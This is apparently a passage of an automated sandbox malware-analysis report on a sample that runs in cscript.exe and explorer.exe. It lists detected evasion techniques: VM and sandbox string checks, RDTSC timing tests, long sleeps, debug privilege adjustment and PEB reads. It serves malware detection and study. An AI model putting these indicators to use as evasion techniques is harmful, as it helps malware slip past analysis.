            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion:

            barindex
            Yara detected AntiVM3Show sources
            Source: Yara matchFile source: 0.2.z7d1ehQQQW.exe.2d13274.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.676276288.0000000002BE1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: z7d1ehQQQW.exe PID: 984, type: MEMORYSTR
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: z7d1ehQQQW.exe, 00000000.00000002.676276288.0000000002BE1000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
            Source: z7d1ehQQQW.exe, 00000000.00000002.676276288.0000000002BE1000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
            Tries to detect virtualization through RDTSC time measurementsShow sources
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeRDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\cscript.exeRDTSC instruction interceptor: First address: 0000000002D598E4 second address: 0000000002D598EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\cscript.exeRDTSC instruction interceptor: First address: 0000000002D59B4E second address: 0000000002D59B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe TID: 3880Thread sleep time: -41295s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exe TID: 1288Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\explorer.exe TID: 3980Thread sleep time: -46000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\cscript.exe TID: 6176Thread sleep time: -50000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeCode function: 5_2_00409A80 rdtsc 5_2_00409A80
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeThread delayed: delay time: 41295Jump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: explorer.exe, 00000006.00000000.705078872.000000000FDAF000.00000004.00000001.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: z7d1ehQQQW.exe, 00000000.00000002.676276288.0000000002BE1000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: explorer.exe, 00000006.00000000.689058385.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: z7d1ehQQQW.exe, 00000000.00000002.676276288.0000000002BE1000.00000004.00000001.sdmpBinary or memory string: vmware
            Source: explorer.exe, 00000006.00000000.699256456.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000006.00000000.689058385.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000006.00000000.764509665.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
            Source: explorer.exe, 00000006.00000000.689219732.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
            Source: z7d1ehQQQW.exe, 00000000.00000002.676276288.0000000002BE1000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
            Source: explorer.exe, 00000006.00000000.689219732.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
            Source: explorer.exe, 00000006.00000000.722338176.000000000FDD4000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Mail
            Source: z7d1ehQQQW.exe, 00000000.00000002.676276288.0000000002BE1000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeCode function: 5_2_00409A80 rdtsc 5_2_00409A80
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\cscript.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048B9080 mov eax, dword ptr fs:[00000030h]9_2_048B9080
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04933884 mov eax, dword ptr fs:[00000030h]9_2_04933884
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04933884 mov eax, dword ptr fs:[00000030h]9_2_04933884
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048C849B mov eax, dword ptr fs:[00000030h]9_2_048C849B
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048F90AF mov eax, dword ptr fs:[00000030h]9_2_048F90AF
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048EF0BF mov ecx, dword ptr fs:[00000030h]9_2_048EF0BF
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048EF0BF mov eax, dword ptr fs:[00000030h]9_2_048EF0BF
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048EF0BF mov eax, dword ptr fs:[00000030h]9_2_048EF0BF
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0494B8D0 mov eax, dword ptr fs:[00000030h]9_2_0494B8D0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0494B8D0 mov ecx, dword ptr fs:[00000030h]9_2_0494B8D0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0494B8D0 mov eax, dword ptr fs:[00000030h]9_2_0494B8D0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0494B8D0 mov eax, dword ptr fs:[00000030h]9_2_0494B8D0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0494B8D0 mov eax, dword ptr fs:[00000030h]9_2_0494B8D0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0494B8D0 mov eax, dword ptr fs:[00000030h]9_2_0494B8D0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04988CD6 mov eax, dword ptr fs:[00000030h]9_2_04988CD6
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04936CF0 mov eax, dword ptr fs:[00000030h]9_2_04936CF0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04936CF0 mov eax, dword ptr fs:[00000030h]9_2_04936CF0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04936CF0 mov eax, dword ptr fs:[00000030h]9_2_04936CF0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_049714FB mov eax, dword ptr fs:[00000030h]9_2_049714FB
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04937016 mov eax, dword ptr fs:[00000030h]9_2_04937016
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04937016 mov eax, dword ptr fs:[00000030h]9_2_04937016
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04937016 mov eax, dword ptr fs:[00000030h]9_2_04937016
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04984015 mov eax, dword ptr fs:[00000030h]9_2_04984015
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04984015 mov eax, dword ptr fs:[00000030h]9_2_04984015
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04971C06 mov eax, dword ptr fs:[00000030h]9_2_04971C06
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04971C06 mov eax, dword ptr fs:[00000030h]9_2_04971C06
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04971C06 mov eax, dword ptr fs:[00000030h]9_2_04971C06
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04971C06 mov eax, dword ptr fs:[00000030h]9_2_04971C06
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04971C06 mov eax, dword ptr fs:[00000030h]9_2_04971C06
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04971C06 mov eax, dword ptr fs:[00000030h]9_2_04971C06
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04971C06 mov eax, dword ptr fs:[00000030h]9_2_04971C06
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04971C06 mov eax, dword ptr fs:[00000030h]9_2_04971C06
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04971C06 mov eax, dword ptr fs:[00000030h]9_2_04971C06
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04971C06 mov eax, dword ptr fs:[00000030h]9_2_04971C06
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04971C06 mov eax, dword ptr fs:[00000030h]9_2_04971C06
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04971C06 mov eax, dword ptr fs:[00000030h]9_2_04971C06
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04971C06 mov eax, dword ptr fs:[00000030h]9_2_04971C06
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04971C06 mov eax, dword ptr fs:[00000030h]9_2_04971C06
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0498740D mov eax, dword ptr fs:[00000030h]9_2_0498740D
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0498740D mov eax, dword ptr fs:[00000030h]9_2_0498740D
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0498740D mov eax, dword ptr fs:[00000030h]9_2_0498740D
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04936C0A mov eax, dword ptr fs:[00000030h]9_2_04936C0A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04936C0A mov eax, dword ptr fs:[00000030h]9_2_04936C0A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04936C0A mov eax, dword ptr fs:[00000030h]9_2_04936C0A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04936C0A mov eax, dword ptr fs:[00000030h]9_2_04936C0A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048EBC2C mov eax, dword ptr fs:[00000030h]9_2_048EBC2C
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048CB02A mov eax, dword ptr fs:[00000030h]9_2_048CB02A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048CB02A mov eax, dword ptr fs:[00000030h]9_2_048CB02A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048CB02A mov eax, dword ptr fs:[00000030h]9_2_048CB02A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048CB02A mov eax, dword ptr fs:[00000030h]9_2_048CB02A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0494C450 mov eax, dword ptr fs:[00000030h]9_2_0494C450
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0494C450 mov eax, dword ptr fs:[00000030h]9_2_0494C450
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048EA44B mov eax, dword ptr fs:[00000030h]9_2_048EA44B
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048D0050 mov eax, dword ptr fs:[00000030h]9_2_048D0050
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048D0050 mov eax, dword ptr fs:[00000030h]9_2_048D0050
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048D746D mov eax, dword ptr fs:[00000030h]9_2_048D746D
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04972073 mov eax, dword ptr fs:[00000030h]9_2_04972073
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04981074 mov eax, dword ptr fs:[00000030h]9_2_04981074
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048B2D8A mov eax, dword ptr fs:[00000030h]9_2_048B2D8A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048B2D8A mov eax, dword ptr fs:[00000030h]9_2_048B2D8A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048B2D8A mov eax, dword ptr fs:[00000030h]9_2_048B2D8A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048B2D8A mov eax, dword ptr fs:[00000030h]9_2_048B2D8A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048B2D8A mov eax, dword ptr fs:[00000030h]9_2_048B2D8A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048EA185 mov eax, dword ptr fs:[00000030h]9_2_048EA185
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048DC182 mov eax, dword ptr fs:[00000030h]9_2_048DC182
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048EFD9B mov eax, dword ptr fs:[00000030h]9_2_048EFD9B
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048EFD9B mov eax, dword ptr fs:[00000030h]9_2_048EFD9B
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048E61A0 mov eax, dword ptr fs:[00000030h]9_2_048E61A0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048E61A0 mov eax, dword ptr fs:[00000030h]9_2_048E61A0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048E35A1 mov eax, dword ptr fs:[00000030h]9_2_048E35A1
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048E1DB5 mov eax, dword ptr fs:[00000030h]9_2_048E1DB5
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048E1DB5 mov eax, dword ptr fs:[00000030h]9_2_048E1DB5
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048E1DB5 mov eax, dword ptr fs:[00000030h]9_2_048E1DB5
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04968DF1 mov eax, dword ptr fs:[00000030h]9_2_04968DF1
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048BB1E1 mov eax, dword ptr fs:[00000030h]9_2_048BB1E1
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048BB1E1 mov eax, dword ptr fs:[00000030h]9_2_048BB1E1
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048BB1E1 mov eax, dword ptr fs:[00000030h]9_2_048BB1E1
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048CD5E0 mov eax, dword ptr fs:[00000030h]9_2_048CD5E0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048CD5E0 mov eax, dword ptr fs:[00000030h]9_2_048CD5E0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_049441E8 mov eax, dword ptr fs:[00000030h]9_2_049441E8
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048B9100 mov eax, dword ptr fs:[00000030h]9_2_048B9100
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048B9100 mov eax, dword ptr fs:[00000030h]9_2_048B9100
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048B9100 mov eax, dword ptr fs:[00000030h]9_2_048B9100
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0493A537 mov eax, dword ptr fs:[00000030h]9_2_0493A537
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04988D34 mov eax, dword ptr fs:[00000030h]9_2_04988D34
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048D4120 mov eax, dword ptr fs:[00000030h]9_2_048D4120
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048D4120 mov eax, dword ptr fs:[00000030h]9_2_048D4120
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048D4120 mov eax, dword ptr fs:[00000030h]9_2_048D4120
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048D4120 mov eax, dword ptr fs:[00000030h]9_2_048D4120
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048D4120 mov ecx, dword ptr fs:[00000030h]9_2_048D4120
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048E513A mov eax, dword ptr fs:[00000030h]9_2_048E513A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048E513A mov eax, dword ptr fs:[00000030h]9_2_048E513A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048E4D3B mov eax, dword ptr fs:[00000030h]9_2_048E4D3B
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048E4D3B mov eax, dword ptr fs:[00000030h]9_2_048E4D3B
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048E4D3B mov eax, dword ptr fs:[00000030h]9_2_048E4D3B
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048C3D34 mov eax, dword ptr fs:[00000030h]9_2_048C3D34
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048C3D34 mov eax, dword ptr fs:[00000030h]9_2_048C3D34
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048C3D34 mov eax, dword ptr fs:[00000030h]9_2_048C3D34
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048C3D34 mov eax, dword ptr fs:[00000030h]9_2_048C3D34
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048C3D34 mov eax, dword ptr fs:[00000030h]9_2_048C3D34
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048C3D34 mov eax, dword ptr fs:[00000030h]9_2_048C3D34
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048C3D34 mov eax, dword ptr fs:[00000030h]9_2_048C3D34
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048C3D34 mov eax, dword ptr fs:[00000030h]9_2_048C3D34
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048C3D34 mov eax, dword ptr fs:[00000030h]9_2_048C3D34
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048C3D34 mov eax, dword ptr fs:[00000030h]9_2_048C3D34
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048C3D34 mov eax, dword ptr fs:[00000030h]9_2_048C3D34
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048C3D34 mov eax, dword ptr fs:[00000030h]9_2_048C3D34
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048C3D34 mov eax, dword ptr fs:[00000030h]9_2_048C3D34
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048BAD30 mov eax, dword ptr fs:[00000030h]9_2_048BAD30
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048DB944 mov eax, dword ptr fs:[00000030h]9_2_048DB944
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048DB944 mov eax, dword ptr fs:[00000030h]9_2_048DB944
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048F3D43 mov eax, dword ptr fs:[00000030h]9_2_048F3D43
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04933540 mov eax, dword ptr fs:[00000030h]9_2_04933540
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048D7D50 mov eax, dword ptr fs:[00000030h]9_2_048D7D50
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048BC962 mov eax, dword ptr fs:[00000030h]9_2_048BC962
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048BB171 mov eax, dword ptr fs:[00000030h]9_2_048BB171
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048BB171 mov eax, dword ptr fs:[00000030h]9_2_048BB171
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048DC577 mov eax, dword ptr fs:[00000030h]9_2_048DC577
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048DC577 mov eax, dword ptr fs:[00000030h]9_2_048DC577
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0494FE87 mov eax, dword ptr fs:[00000030h]9_2_0494FE87
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048ED294 mov eax, dword ptr fs:[00000030h]9_2_048ED294
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048ED294 mov eax, dword ptr fs:[00000030h]9_2_048ED294
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048B52A5 mov eax, dword ptr fs:[00000030h]9_2_048B52A5
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048B52A5 mov eax, dword ptr fs:[00000030h]9_2_048B52A5
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048B52A5 mov eax, dword ptr fs:[00000030h]9_2_048B52A5
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048B52A5 mov eax, dword ptr fs:[00000030h]9_2_048B52A5
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048B52A5 mov eax, dword ptr fs:[00000030h]9_2_048B52A5
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_049346A7 mov eax, dword ptr fs:[00000030h]9_2_049346A7
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048CAAB0 mov eax, dword ptr fs:[00000030h]9_2_048CAAB0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048CAAB0 mov eax, dword ptr fs:[00000030h]9_2_048CAAB0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04980EA5 mov eax, dword ptr fs:[00000030h]9_2_04980EA5
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04980EA5 mov eax, dword ptr fs:[00000030h]9_2_04980EA5
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04980EA5 mov eax, dword ptr fs:[00000030h]9_2_04980EA5
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048EFAB0 mov eax, dword ptr fs:[00000030h]9_2_048EFAB0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048E36CC mov eax, dword ptr fs:[00000030h]9_2_048E36CC
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048F8EC7 mov eax, dword ptr fs:[00000030h]9_2_048F8EC7
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04988ED6 mov eax, dword ptr fs:[00000030h]9_2_04988ED6
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0496FEC0 mov eax, dword ptr fs:[00000030h]9_2_0496FEC0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048E16E0 mov ecx, dword ptr fs:[00000030h]9_2_048E16E0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048C76E2 mov eax, dword ptr fs:[00000030h]9_2_048C76E2
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048C8A0A mov eax, dword ptr fs:[00000030h]9_2_048C8A0A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048BC600 mov eax, dword ptr fs:[00000030h]9_2_048BC600
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048BC600 mov eax, dword ptr fs:[00000030h]9_2_048BC600
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048BC600 mov eax, dword ptr fs:[00000030h]9_2_048BC600
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048D3A1C mov eax, dword ptr fs:[00000030h]9_2_048D3A1C
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048EA61C mov eax, dword ptr fs:[00000030h]9_2_048EA61C
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048EA61C mov eax, dword ptr fs:[00000030h]9_2_048EA61C
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0496FE3F mov eax, dword ptr fs:[00000030h]9_2_0496FE3F
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048BE620 mov eax, dword ptr fs:[00000030h]9_2_048BE620
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04944257 mov eax, dword ptr fs:[00000030h]9_2_04944257
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048B9240 mov eax, dword ptr fs:[00000030h]9_2_048B9240
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048B9240 mov eax, dword ptr fs:[00000030h]9_2_048B9240
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048B9240 mov eax, dword ptr fs:[00000030h]9_2_048B9240
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048B9240 mov eax, dword ptr fs:[00000030h]9_2_048B9240
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048C7E41 mov eax, dword ptr fs:[00000030h]9_2_048C7E41
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048C7E41 mov eax, dword ptr fs:[00000030h]9_2_048C7E41
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048C7E41 mov eax, dword ptr fs:[00000030h]9_2_048C7E41
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048C7E41 mov eax, dword ptr fs:[00000030h]9_2_048C7E41
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048C7E41 mov eax, dword ptr fs:[00000030h]9_2_048C7E41
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048C7E41 mov eax, dword ptr fs:[00000030h]9_2_048C7E41
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048C766D mov eax, dword ptr fs:[00000030h]9_2_048C766D
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048F927A mov eax, dword ptr fs:[00000030h]9_2_048F927A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0496B260 mov eax, dword ptr fs:[00000030h]9_2_0496B260
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0496B260 mov eax, dword ptr fs:[00000030h]9_2_0496B260
